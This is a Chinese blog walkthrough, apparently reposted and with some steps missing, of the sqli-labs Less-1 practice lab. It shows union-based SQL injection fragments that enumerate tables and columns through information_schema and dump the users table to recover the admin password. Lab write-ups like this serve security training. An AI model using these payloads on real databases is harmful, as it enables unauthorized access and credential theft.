2.根据提示输入id的值如下(?id = key),发现id的值变化时,页面显示的内容也会变化 
6.根据显示发现2,3可以显示出来,那么可以在2,3处进行database()和version()操作 
7.接下来就是进行爆表名的操作:group_concat(table_name) from information_schema.tables where table_schema = database() 
8.根据观察来看users表中会有管理员的账户和密码,爆users表的列名即可,group_concat(column_name) from information_schema.columns where table_name = ‘users’ 
9.在users表中有三列,全部查询即可,group_concat(username,id,password) from users 
10.这样就找到了admin账户及其密码
本文来自博客园,作者:LYL233,转载请注明原文链接:https://www.cnblogs.com/amour233/p/16757150.html
Original: https://www.cnblogs.com/amour233/p/16757150.html
Author: LYL233
Title: sqli-labs-master/Less-1解题过程
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/643779/
转载文章受原作者版权保护。转载请注明原作者出处!